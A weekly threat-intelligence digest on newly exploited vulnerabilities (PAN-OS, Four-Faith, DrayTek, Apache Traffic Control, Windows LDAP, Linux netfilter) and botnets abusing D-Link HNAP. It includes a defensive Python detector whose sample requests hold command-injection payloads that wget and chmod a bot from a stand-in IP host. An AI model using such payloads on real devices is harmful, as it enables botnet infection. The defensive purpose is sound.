Executive Summary
This week saw the addition of a single vulnerability to the CISA KEV catalog, involving a critical issue in Palo Alto Networks systems. Active exploitation has been observed in Four-Faith industrial routers, raising alarms about the need for immediate patching. Researchers have also released proof-of-concept exploit code for high-impact vulnerabilities in Microsoft Windows, Linux kernel, Apache Traffic Control, and DrayTek gateway devices, amplifying the risk to unpatched systems and critical infrastructure.
Botnet activity has notably intensified, with emerging threats like Zerobot targeting Tenda WiFi routers and Andoryu exploiting vulnerabilities in GitLab. Meanwhile, IoT-specific botnets, such as IoT Reaper and AndroxGh0st, persist in attacking Cisco routers and PHPUnit. Legacy threats like Mirai and Tsunami are exploiting an eight-year-old flaw in the Eir D1000 modem, underscoring the significant dangers posed by outdated and unsupported infrastructure.
Adding to the concerns, Fortinet has observed a surge in botnet activity involving Ficora and Capsaicin. These botnets have been actively exploiting end-of-life vulnerabilities in D-Link devices, spotlighting the persistent risks associated with unsupported hardware.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping readers make informed decisions.
Palo Alto Networks has patched a high-severity denial-of-service (DoS) vulnerability in the DNS Security feature of PAN-OS software. This vulnerability, now listed in the CISA KEV catalog, can be triggered by a maliciously crafted packet sent through the firewall's data plane, causing it to reboot and enter a DoS state. Repeated exploit attempts could even force the firewall into maintenance mode. Immediate mitigation through patching is strongly recommended to avoid potential disruptions.
VulnCheck has issued an alert regarding the active exploitation of a high-severity vulnerability in Four-Faith industrial routers. This unauthenticated operating system command injection vulnerability allows attackers to remotely execute arbitrary commands on vulnerable devices. With a high CVSS score of 7.2, the vulnerability affects the F3x24 and F3x36 versions of the routers, posing a significant risk to systems still using these versions.
A command injection vulnerability has been identified in the web management interface of DrayTek gateway devices, allowing attackers to execute arbitrary commands remotely. With a high CVSS score of 7.3, this flaw affects DrayTek Vigor 2960 and DrayTek Vigor 300B devices running version 1.5.1.4. The availability of proof-of-concept (PoC) exploit code further increases the risk, making it crucial for organizations to address this vulnerability promptly to safeguard their systems.
Apache Traffic Control versions 8.0.0 to 8.0.1 are vulnerable to a critical SQL injection flaw with a CVSS score of 9.9. This vulnerability allows users with specific roles, including 'admin', 'federation', 'operations', 'portal', or 'steering', to execute arbitrary SQL commands on the database through a specially crafted PUT request. The recent release of a proof-of-concept (PoC) exploit on GitHub has heightened the urgency, as it lowers the barrier for attackers to exploit unpatched systems.
SafeBreach Labs has uncovered a critical zero-click vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) service, dubbed "LDAP Nightmare," with a CVSS score of 9.8. This flaw requires no authentication or preconditions, other than Internet connectivity to the DNS server, making it a highly accessible attack vector. Exploiting this vulnerability can trigger a crash in the Local Security Authority Subsystem Service (LSASS), effectively causing unpatched Windows Servers to crash through malicious LDAP queries.
A use-after-free (UAF) vulnerability has been identified in the Linux kernel's Netfilter framework, impacting versions v5.9-rc1 to v6.5-rc3, with a high CVSS score of 7.8. This flaw arises from improper handling of the NFTA_RULE_CHAIN_ID during rule additions, allowing authenticated attackers to escalate privileges or cause system crashes. The vulnerability occurs when a rule bypasses normal restrictions and is added to a bound chain using NFTA_RULE_CHAIN_ID, creating an inconsistency. If a chain with the NFT_CHAIN_BINDING flag links to an immediate expression that is subsequently destroyed, it leads to the destruction of the bound chain and its associated rules, triggering the UAF flaw. With a proof-of-concept (PoC) exploit publicly available, it is imperative for system administrators to patch affected systems promptly.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. We present the top 5 CVEs whose payloads are suggestive of botnet activity, such as invoking wget against raw IP addresses.
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The source information is derived from our vulnerability intelligence platform, which collects and curates information from various sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
Botnets Exploiting End-of-Life D-Link Devices
FortiGuard Labs observed a surge in activity from two botnets: the Mirai variant "FICORA" and the Kaiten variant "CAPSAICIN." Both botnets exploit long-standing vulnerabilities in D-Link devices, leveraging weaknesses in the Home Network Administration Protocol (HNAP) interface. Specifically, attackers use the GetDeviceSettings action to execute malicious commands remotely. Notably, this HNAP vulnerability was first disclosed nearly a decade ago, yet it continues to be a vector for widespread exploitation, underscoring the critical need for regular patching and robust security measures.
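The two payload traits this report relies on for triage, shell metacharacters inside an HNAP GetDeviceSettings SOAPAction header (the D-Link vector above) and wget/curl fetching from a bare IPv4 host (the botnet-stager heuristic from the "Vulnerabilities abused by Botnet" section), can be turned into a small sensor-side classifier. This is an added illustration, not Loginsoft or FortiGuard code; the request records and addresses are constructed (RFC 5737 test ranges) and the tag names are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sensor records (not real telemetry): one dict per HTTP request.
SAMPLE_REQUESTS: List[Dict] = [
    {"src": "203.0.113.5", "path": "/HNAP1/",
     "headers": {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp;wget http://198.51.100.7/a.sh`"'},
     "body": ""},
    {"src": "203.0.113.9", "path": "/HNAP1/",
     "headers": {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings"'},
     "body": ""},  # legitimate-looking HNAP call, no metacharacters
    {"src": "203.0.113.12", "path": "/cgi-bin/login.cgi", "headers": {},
     "body": "user=admin;wget http://198.51.100.7/bot -O /tmp/bot;chmod 777 /tmp/bot"},
    {"src": "203.0.113.20", "path": "/index.html", "headers": {}, "body": "q=wget"},
]

# Characters that let a value break out of the HNAP action string into a shell.
SHELL_META = re.compile(r"[`;|&$]")
# wget/curl whose download URL names a bare IPv4 host: stagers rarely use DNS names.
IP_FETCH = re.compile(r"\b(?:wget|curl)\b[^\n]*?https?://(\d{1,3}(?:\.\d{1,3}){3})", re.I)


def classify(req: Dict) -> List[str]:
    """Return the list of triage tags that apply to one request record."""
    tags: List[str] = []
    soap = req["headers"].get("SOAPAction", "")
    # HNAP command injection: the action name is present and the value carries shell syntax.
    if "GetDeviceSettings" in soap and SHELL_META.search(soap):
        tags.append("hnap_getdevicesettings_injection")
    # Stager heuristic is applied to headers and body alike, since either may carry it.
    m = IP_FETCH.search(soap + "\n" + req["body"])
    if m:
        tags.append("botnet_stager_fetch:" + m.group(1))
    return tags


def scan(reqs: List[Dict]) -> List[Tuple[str, List[str]]]:
    """Keep only flagged requests as (source address, tags) pairs for analyst review."""
    return [(r["src"], classify(r)) for r in reqs if classify(r)]


if __name__ == "__main__":
    for src, tags in scan(SAMPLE_REQUESTS):
        print(src, ", ".join(tags))
```

The stager host captured in the tag is the value an analyst would pivot on to group samples from one campaign.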
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2024/12/30/cisa-adds-one-known-exploited-vulnerability-catalog
- https://vulncheck.com/blog/four-faith-cve-2024-12856
- https://netsecfish.notion.site/Command-Injection-in-apmcfgupload-endpoint-for-DrayTek-Gateway-Devices-1676b683e67c8040b7f1f0ffe29ce18f
- https://securityonline.info/66000-draytek-gateways-vulnerable-to-remote-command-injection-cve-2024-12987-poc-published/
- https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
- https://securityonline.info/linux-kernel-vulnerability-cve-2023-4147-poc-exploit-published-for-privilege-escalation-flaw/
- https://securityonline.info/poc-exploit-released-for-zero-click-vulnerability-cve-2024-49112-in-windows/